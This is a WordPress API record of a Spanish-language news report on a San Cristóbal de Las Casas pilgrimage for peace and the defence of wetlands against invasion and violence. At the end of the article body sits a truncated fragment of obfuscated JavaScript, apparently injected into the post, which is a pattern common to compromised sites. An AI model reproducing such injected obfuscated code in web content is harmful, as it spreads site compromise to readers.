{"id":9936,"date":"2023-05-08T01:51:30","date_gmt":"2023-05-08T01:51:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9936"},"modified":"2023-05-08T01:51:32","modified_gmt":"2023-05-08T01:51:32","slug":"realizan-peregrinacion-por-la-paz-y-defensa-de-los-humedales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9936","title":{"rendered":"Realizan peregrinaci\u00f3n por la paz y defensa de los humedales"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"484\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-07-at-2.05.20-PM-1-1024x484.jpeg\" alt=\"\" class=\"wp-image-9937\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-07-at-2.05.20-PM-1-1024x484.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-07-at-2.05.20-PM-1-300x142.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-07-at-2.05.20-PM-1-768x363.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-07-at-2.05.20-PM-1-1536x727.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-07-at-2.05.20-PM-1.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Con una peregrinaci\u00f3n y ritual en el Manantial Maria Eugenia, pobladores de diversas colonias de los cuatro puntos de San Realizan peregrinaci\u00f3n por la paz y defensa de los humedales, caminaron este domingo 7 de mayo para hacer el llamado a organizarse en defensa del territorio, el agua, la seguridad y la paz con la participaci\u00f3n activa de las familias, mujeres, ni\u00f1as, ni\u00f1os, abuelas, abuelos y j\u00f3venes del valle de Jovel. \u201cNos unimos integrantes de los cuatro puntos de la ciudad para conmemorar el d\u00eda de la Santa Cruz, apegados a la cosmovisi\u00f3n de los pueblos originarios, y en el reconocimiento de la relaci\u00f3n con las lluvias, la siembra, el agua, la paz, la defensa de territorio y del renacer de la vida con la llegada de la primavera\u201d, dijo al respecto el activista Nicol\u00e1s G\u00f3mez Velasco. Con esta peregrinaci\u00f3n se manifestaron en contra de la violencia que vive la ciudad, \u201cdonde estamos expuestos toda la poblaci\u00f3n, siendo uno de los sectores m\u00e1s vulnerables los j\u00f3venes de las escuelas, un promedio de 18 entre primarias, secundarias, preparatorias, y nivel universitario de la zona sur son blanco de la delincuencia ya que ven a este sector como punto importante para hacerse de mayores ganancias, sin importar el grado de violencia y de adicci\u00f3n, provocado por grupos del crimen organizado. A pesar de las m\u00faltiples denuncias realizadas a las autoridades, act\u00faan en complicidad\u201d. Denunci\u00f3 todo tipo de violencia en la zona sur, como las invasiones de los humedales de Monta\u00f1a Mar\u00eda Eugenia y La Kisst declarados \u00c1rea Natural Protegida y H\u00e1bitat Cr\u00edtico, de importancia por ser  fuentes de agua y por su biodiversidad de especies end\u00e9micas, \u201cdichas invasiones son llevadas a cabo por grupos ligados a intereses pol\u00edticos y criminales o carteles inmobiliarios donde la ambici\u00f3n por el dinero destruye las partes altas de las monta\u00f1as, bosques, reservas ecol\u00f3gicas, arroyos, manantiales y los humedales con la intenci\u00f3n de urbanizar, con consecuencias que son perceptibles en los \u00faltimos a\u00f1os, eventos meteorol\u00f3gicos extremos\u201d. \u201cNos unimos en esta celebraci\u00f3n, nuestra defensa a sido con acciones comunitarias, la restauraci\u00f3n y recuperaci\u00f3n de nuestro entorno y de las \u00e1reas verdes, o bien con campa\u00f1as de limpieza, huertos comunitarios, captaci\u00f3n de agua de lluvia, implementaci\u00f3n de cercos vivos, acciones de reforestaci\u00f3n en las partes altas y bajas de los humedales, talleres con ni\u00f1as, ni\u00f1os y j\u00f3venes\u201d, a\u00f1ade. Hizo un llamado a las autoridades de los tres niveles de gobierno para que act\u00faen en la protecci\u00f3n y el resguardo de los humedales de monta\u00f1a con la finalidad de garantizar el derecho establecido en el Art\u00edculo 4 Constitucional, \u201ca un medio ambiente sano, as\u00ed como garantizar el acceso al Agua, la Salud y la Vida\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/corresponsal San Crist\u00f3bal de Las Casas.- Con una peregrinaci\u00f3n y ritual en el Manantial Maria Eugenia, pobladores de diversas colonias de los cuatro puntos de San Realizan peregrinaci\u00f3n por la paz y defensa de los humedales, caminaron este domingo 7 de mayo para hacer el llamado a organizarse en defensa del territorio, el agua, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9937,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9936","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9936","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9936"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9936\/revisions"}],"predecessor-version":[{"id":9938,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9936\/revisions\/9938"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9937"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9936"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9936"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9936"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}